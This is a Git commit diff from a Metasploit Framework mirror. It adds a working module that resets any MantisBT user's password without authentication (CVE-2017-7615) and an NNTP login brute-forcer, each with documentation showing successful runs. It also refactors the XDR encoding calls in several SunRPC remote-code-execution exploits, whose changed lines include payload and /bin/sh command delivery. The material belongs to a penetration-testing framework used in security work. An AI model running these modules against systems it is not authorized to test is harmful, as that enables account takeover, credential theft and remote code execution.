infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into kill-cucumber

bug/bundler_fix
dmaloney-r7 2017-07-14 10:23:38 -05:00 committed by GitHub
parent dbef4ee816 de230478eb
commit d6ee0ca94d
20 changed files with 424 additions and 51 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.15.0)
metasploit-framework (4.15.1)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)

30
documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md Normal file
View File

@ -0,0 +1,30 @@
## Vulnerable Application
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
on
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfully changed.
## Scenarios
```
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set rport 8082
rport => 8082
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > run
[+] Password successfully changed to 'ndOQTmhQ'.
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_password_reset) >
```

42
documentation/modules/auxiliary/scanner/nntp/nntp_login.md Normal file
View File

@ -0,0 +1,42 @@
## Description
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
This module has been tested successfully on:
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
## Verification Steps
1. Do: `use auxiliary/scanner/nntp/nntp_login`
2. Do: `set RHOSTS [IP]`
3. Do: `set RPORT [IP]`
4. Do: `run`
## Scenarios
```
msf auxiliary(nntp_login) > run
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.15.0"
VERSION = "4.15.1"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

4
lib/msf/core/exploit/sunrpc.rb
View File

@ -16,8 +16,6 @@ module Msf
module Exploit::Remote::SunRPC
include Exploit::Remote::Tcp
XDR = Rex::Encoder::XDR
MSG_ACCEPTED = 0
SUCCESS = 0 # RPC executed successfully
PROG_UMAVAIL = 1 # Remote hasn't exported program
@ -72,7 +70,7 @@ module Exploit::Remote::SunRPC
ret = rpcobj.create
raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to Portmap request" unless ret
arr = XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS || arr[5] == 0
err = "#{rhost}:#{rport} - SunRPC - Portmap request failed: "
err << 'Message not accepted' if arr[1] != MSG_ACCEPTED

26
lib/msf/ui/console/command_dispatcher/resource.rb
View File

@ -37,8 +37,8 @@ module Msf
def cmd_resource_help
print_line "Usage: resource path1 [path2 ...]"
print_line
print_line "Run the commands stored in the supplied files. Resource files may also contain"
print_line "ruby code between <ruby></ruby> tags."
print_line "Run the commands stored in the supplied files (- for stdin)."
print_line "Resource files may also contain ERB or Ruby code between <ruby></ruby> tags."
print_line
print_line "See also: makerc"
print_line
@ -52,21 +52,23 @@ module Msf
args.each do |res|
good_res = nil
if ::File.exist?(res)
if res == '-'
good_res = res
elsif ::File.exist?(res)
good_res = res
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
[
::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
].each do |dir|
res_path = dir + ::File::SEPARATOR + res
if ::File.exist?(res_path)
good_res = res_path
break
[
::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
].each do |dir|
res_path = dir + ::File::SEPARATOR + res
if ::File.exist?(res_path)
good_res = res_path
break
end
end
end
end
if good_res
driver.load_resource(good_res)
else

2
lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
View File

@ -373,7 +373,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
block_size = opts['block_size'] || 1024 * 1024
block_size = (opts && opts['block_size']) || 1024 * 1024
begin
if tries
# resume when timeouts encountered

113
modules/auxiliary/admin/http/mantisbt_password_reset.rb Normal file
View File

@ -0,0 +1,113 @@
##
# This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "MantisBT password reset",
'Description' => %q{
MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.
},
'License' => MSF_LICENSE,
'Author' =>
[
'John (hyp3rlinx) Page', # initial discovery
'Julien (jvoisin) Voisin' # metasploit module
],
'References' =>
[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'DisclosureDate' => "Apr 16 2017"))
register_options(
[
OptString.new('USERID', [ true, 'User id to reset', 1]),
OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
]
)
end
def check
begin
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login_page.php'),
'method'=>'GET'
})
if res && res.body && res.body.include?('Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT')
vprint_status("MantisBT detected")
return Exploit::CheckCode::Detected
else
vprint_status("Not a MantisBT Instance!")
return Exploit::CheckCode::Safe
end
rescue Rex::ConnectionRefused
print_error("Connection refused by server.")
return Exploit::CheckCode::Safe
end
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/verify.php'),
'method' => 'GET',
'vars_get' => {
'id' => datastore['USERID'],
'confirm_hash' => ''
}
})
if !res || !res.body
fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
end
cookie = res.get_cookies
if cookie == '' || !(res.body.include? 'Your account information has been verified.')
fail_with(Failure::NoAccess, "Authentication failed")
end
if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']
end
if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
token = $1
else
fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/account_update.php'),
'method' => 'POST',
'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
'password' => password,
'password_confirm' => password
},
'cookie' => cookie
})
if res && res.body && res.body.include?('Password successfully updated')
print_good("Password successfully changed to '#{password}'.")
else
fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')
end
end
end

14
modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
View File

@ -66,14 +66,14 @@ class MetasploitModule < Msf::Auxiliary
# Prepare the traversing request for kcms_server
trav = 'TT_DB/' + ('../' * 5) + path
buf = XDR.encode(
buf = Rex::Encoder::XDR.encode(
[trav, 1024],
0, # O_RDONLY
0755) # mode
# Make the request
ret = sunrpc_call(1003, buf)
ack, fsize, fd = XDR.decode!(ret, Integer, Integer, Integer)
ack, fsize, fd = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer)
if (ack != 0)
print_error("KCMS open() failed (ack: 0x%x != 0)" % ack)
@ -88,13 +88,13 @@ class MetasploitModule < Msf::Auxiliary
print_status("fd: #{fd}, file size #{fsize}")
print_status("Making read() request to the kcms_server...")
buf = XDR.encode(
buf = Rex::Encoder::XDR.encode(
fd,
0,
fsize)
ret = sunrpc_call(1005, buf)
x, data = XDR.decode!(ret, Integer, [Integer])
x, data = Rex::Encoder::XDR.decode!(ret, Integer, [Integer])
# If we got something back...
if (data)
@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
# Close it regardless if it returned anything..
print_status("Making close() request to the kcms_server...")
buf = XDR.encode(fd)
buf = Rex::Encoder::XDR.encode(fd)
sunrpc_call(1004, buf)
# done
@ -138,7 +138,7 @@ class MetasploitModule < Msf::Auxiliary
def ttdb_build(path)
sunrpc_create('tcp', 100083, 1)
sunrpc_authunix('localhost', 0, 0, [])
msg = XDR.encode(
msg = Rex::Encoder::XDR.encode(
[path, 1024],
path.length,
1, # KEY (VArray head?)
@ -152,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
0x10002,
path.length)
ret = sunrpc_call(3, msg)
arr = XDR.decode!(ret, Integer, Integer)
arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer)
print_status("TTDB reply: 0x%x, %d" % arr)
sunrpc_destroy
end

4
modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
View File

@ -40,8 +40,8 @@ class MetasploitModule < Msf::Auxiliary
progs = resp[3, 1].unpack('C')[0]
maps = []
if (progs == 0x01)
while XDR.decode_int!(resp) == 1
maps << XDR.decode!(resp, Integer, Integer, Integer, Integer)
while Rex::Encoder::XDR.decode_int!(resp) == 1
maps << Rex::Encoder::XDR.decode!(resp, Integer, Integer, Integer, Integer)
end
end
sunrpc_destroy

8
modules/auxiliary/scanner/nfs/nfsmount.rb
View File

@ -56,11 +56,11 @@ class MetasploitModule < Msf::Auxiliary
exports = resp[3,1].unpack('C')[0]
if (exports == 0x01)
shares = []
while XDR.decode_int!(resp) == 1 do
dir = XDR.decode_string!(resp)
while Rex::Encoder::XDR.decode_int!(resp) == 1 do
dir = Rex::Encoder::XDR.decode_string!(resp)
grp = []
while XDR.decode_int!(resp) == 1 do
grp << XDR.decode_string!(resp)
while Rex::Encoder::XDR.decode_int!(resp) == 1 do
grp << Rex::Encoder::XDR.decode_string!(resp)
end
print_good("#{ip} NFS Export: #{dir} [#{grp.join(", ")}]")
shares << [dir, grp]

189
modules/auxiliary/scanner/nntp/nntp_login.rb Normal file
View File

@ -0,0 +1,189 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'NNTP Login Utility',
'Description' => %q{
This module attempts to authenticate to NNTP services
which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication,
but does not support AUTHINFO GENERIC or AUTHINFO SASL
authentication methods.
},
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'License' => MSF_LICENSE,
'References' => [ [ 'CVE', '1999-0502' ], # Weak password
[ 'URL', 'https://tools.ietf.org/html/rfc3977' ],
[ 'URL', 'https://tools.ietf.org/html/rfc4642' ],
[ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))
register_options(
[
Opt::RPORT(119),
OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),
OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])
])
deregister_options 'RHOST'
end
def run_host(ip)
begin
connect
return :abort unless nntp?
return :abort unless supports_authinfo?
report_service :host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'nntp'
disconnect
each_user_pass { |user, pass| do_login user, pass }
rescue ::Interrupt
raise $ERROR_INFO
rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error "#{peer} Connection failed"
return
rescue OpenSSL::SSL::SSLError => e
print_error "SSL negotiation failed: #{e}"
rescue => e
print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"
return
ensure
disconnect
end
end
def nntp?
banner = sock.get_once
if !banner
vprint_error "#{peer} No response"
return false
end
if banner !~ /^200/
print_error 'Unexpected reply'
return false
end
vprint_status 'Server is a NTTP server'
vprint_status "Banner: #{banner}"
true
end
def supports_authinfo?
sock.put "HELP\r\n"
res = sock.get(-1)
code = res.scan(/\A(\d+)\s/).flatten.first.to_i
if code.nil?
print_error 'Server is not a NNTP server'
return false
end
if code == 480
vprint_warning 'Authentication is required before listing authentication capabilities.'
return true
end
if code == 100 && res =~ /authinfo/i
vprint_status 'Server supports AUTHINFO'
return true
end
print_error 'Server does not support AUTHINFO'
false
end
def do_login(user, pass)
vprint_status "Trying username:'#{user}' with password:'#{pass}'"
begin
connect
sock.get_once
sock.put "AUTHINFO USER #{user}\r\n"
res = sock.get_once
unless res
vprint_error "#{peer} No response"
return :abort
end
code = res.scan(/\A(\d+)\s/).flatten.first.to_i
if code != 381
vprint_error "#{peer} Unexpected reply. Skipping user..."
return :skip_user
end
sock.put "AUTHINFO PASS #{pass}\r\n"
res = sock.get_once
unless res
vprint_error "#{peer} No response"
return :abort
end
code = res.scan(/\A(\d+)\s/).flatten.first.to_i
if code == 452 || code == 481
vprint_error "#{peer} Login failed"
return
elsif code == 281
print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"
report_cred ip: rhost,
port: rport,
service_name: 'nntp',
user: user,
password: pass,
proof: code.to_s
return :next_user
else
vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"
return
end
rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
print_error 'Connection failed'
return
rescue OpenSSL::SSL::SSLError => e
print_error "SSL negotiation failed: #{e}"
return :abort
end
rescue => e
print_error "Error: #{e}"
return nil
ensure
disconnect
end
def report_cred(opts)
service_data = { address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id }
credential_data = { origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password }.merge service_data
login_data = { last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof] }.merge service_data
create_credential_login login_data
end
end

4
modules/exploits/aix/rpc_cmsd_opcode21.rb
View File

@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
xdr = XDR.encode(buf, buf)
xdr = Rex::Encoder::XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
xdr = XDR.encode(buf, "")
xdr = Rex::Encoder::XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)

2
modules/exploits/aix/rpc_ttdbserverd_realpath.rb
View File

@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)

1
modules/exploits/multi/http/php_cgi_arg_injection.rb
View File

@ -114,7 +114,6 @@ class MetasploitModule < Msf::Exploit::Remote
create_arg("-d","auto_prepend_file=php://input"),
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
create_arg("-d", "cgi.redirect_status_env=0"),
create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
rand_opt_equiv("-n")
]

12
modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
View File

@ -121,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
buf2 = @nops + payload.encoded
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
Rex::Encoder::XDR.encode(0) * 7 +
Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
hostname, 'system', rand_text_alpha(16))
@ -139,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', buf2) +
XDR.encode('netmgt_endofargs')
Rex::Encoder::XDR.encode('netmgt_endofargs')
request = header + XDR.encode(header.length + body.length - 326) + body
request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
begin
# two seconds timeout for brute force
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def do_string(str1, str2)
XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
XDR.encode(str, 3, 4, int, 0, 0)
Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end

14
modules/exploits/solaris/sunrpc/sadmind_exec.rb
View File

@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sadmind_request(host, command)
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
Rex::Encoder::XDR.encode(0) * 7 +
Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
@ -116,19 +116,19 @@ class MetasploitModule < Msf::Exploit::Remote
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
XDR.encode('netmgt_endofargs')
Rex::Encoder::XDR.encode('netmgt_endofargs')
request = header + XDR.encode(header.length + body.length - 326) + body
request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
return XDR.decode!(ret, Integer, Integer, String)[2]
return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
XDR.encode(str, 3, 4, int, 0, 0)
Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end

2
modules/exploits/solaris/sunrpc/ypupdated_exec.rb
View File

@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy

2
modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
View File

@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
data = "_" + data + "_1_1_1_1_1_1_1_1_1"
request = XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
print_status("Trying target #{target.name}...")

2
modules/exploits/windows/emc/networker_format_string.rb
View File

@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
fs << payload.encoded
xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2)
xdr = Rex::Encoder::XDR.encode(0, 2, rand_text_alpha(10), Rex::Encoder::XDR.encode(fs, rand_text_alpha(10)), 2)
sunrpc_call(6, xdr)
sunrpc_destroy